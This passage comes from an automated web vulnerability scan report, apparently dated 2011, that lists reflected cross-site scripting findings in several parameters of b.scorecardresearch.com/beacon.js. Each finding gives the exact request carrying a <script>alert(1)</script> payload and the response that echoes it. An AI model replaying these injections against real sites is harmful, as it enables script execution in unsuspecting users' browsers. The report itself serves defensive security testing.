Referer: http://delb.opt.fimserve.com/adopt/?r=h&l=10000001&pos=leaderboard&rnd=167275655
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 14 Feb 2011 00:56:26 GMT
Date: Mon, 07 Feb 2011 00:56:26 GMT
Connection: close
Content-Length: 3603

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
unction(a){try{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"3", c2:"6035537c2ee2<script>alert(1)</script>bd3b80d854e", c3:"4732978", c4:"40554329", c5:"56586626", c6:"", c10:"", c15:"", c16:"", r:""});

3.58. http://b.scorecardresearch.com/beacon.js [c3 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c3 request parameter is copied into the HTML document as plain text between tags. The payload 9dc11<script>alert(1)</script>92bb80ca587 was submitted in the c3 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6035537&c3=47329789dc11<script>alert(1)</script>92bb80ca587&c4=40554329&c5=56586626&c6= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://delb.opt.fimserve.com/adopt/?r=h&l=10000001&pos=leaderboard&rnd=167275655
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 14 Feb 2011 00:56:26 GMT
Date: Mon, 07 Feb 2011 00:56:26 GMT
Connection: close
Content-Length: 3603

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
{var c=[],f,b;a=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"3", c2:"6035537", c3:"47329789dc11<script>alert(1)</script>92bb80ca587", c4:"40554329", c5:"56586626", c6:"", c10:"", c15:"", c16:"", r:""});

3.59. http://b.scorecardresearch.com/beacon.js [c4 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c4 request parameter is copied into the HTML document as plain text between tags. The payload 3c4c3<script>alert(1)</script>6d16a689337 was submitted in the c4 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6035537&c3=4732978&c4=405543293c4c3<script>alert(1)</script>6d16a689337&c5=56586626&c6= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://delb.opt.fimserve.com/adopt/?r=h&l=10000001&pos=leaderboard&rnd=167275655
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 14 Feb 2011 00:56:26 GMT
Date: Mon, 07 Feb 2011 00:56:26 GMT
Connection: close
Content-Length: 3603

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
=a||_comscore;for(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"3", c2:"6035537", c3:"4732978", c4:"405543293c4c3<script>alert(1)</script>6d16a689337", c5:"56586626", c6:"", c10:"", c15:"", c16:"", r:""});

3.60. http://b.scorecardresearch.com/beacon.js [c5 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c5 request parameter is copied into the HTML document as plain text between tags. The payload ae4e2<script>alert(1)</script>f3f65b08d45 was submitted in the c5 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6035537&c3=4732978&c4=40554329&c5=56586626ae4e2<script>alert(1)</script>f3f65b08d45&c6= HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://delb.opt.fimserve.com/adopt/?r=h&l=10000001&pos=leaderboard&rnd=167275655
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 14 Feb 2011 00:56:27 GMT
Date: Mon, 07 Feb 2011 00:56:27 GMT
Connection: close
Content-Length: 3603

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
or(b=a.length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"3", c2:"6035537", c3:"4732978", c4:"40554329", c5:"56586626ae4e2<script>alert(1)</script>f3f65b08d45", c6:"", c10:"", c15:"", c16:"", r:""});

3.61. http://b.scorecardresearch.com/beacon.js [c6 parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://b.scorecardresearch.com
Path:   /beacon.js

Issue detail

The value of the c6 request parameter is copied into the HTML document as plain text between tags. The payload 518e0<script>alert(1)</script>654ad6dd3fa was submitted in the c6 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /beacon.js?c1=3&c2=6035537&c3=4732978&c4=40554329&c5=56586626&c6=518e0<script>alert(1)</script>654ad6dd3fa HTTP/1.1
Host: b.scorecardresearch.com
Proxy-Connection: keep-alive
Referer: http://delb.opt.fimserve.com/adopt/?r=h&l=10000001&pos=leaderboard&rnd=167275655
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.13 (KHTML, like Gecko) Chrome/9.0.597.84 Safari/534.13
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: UID=1f00d615-24.143.206.88-1294170954

Response

HTTP/1.1 200 OK
Content-Type: application/x-javascript
Vary: Accept-Encoding
Cache-Control: private, no-transform, max-age=604800
Expires: Mon, 14 Feb 2011 00:56:27 GMT
Date: Mon, 07 Feb 2011 00:56:27 GMT
Connection: close
Content-Length: 3603

if(typeof COMSCORE=="undefined"){window.COMSCORE={}}if(typeof COMSCORE.Beacon=="undefined"){COMSCORE.Beacon={}}if(typeof _comscore!="object"){window._comscore=[]}COMSCORE.beacon=function(j){try{if(!j)
...[SNIP]...
length-1;b>=0;b--){f=COMSCORE.beacon(a[b]);a.splice(b,1);if(f){c.push(f)}}return c}catch(d){}};COMSCORE.purge();
COMSCORE.beacon({c1:"3", c2:"603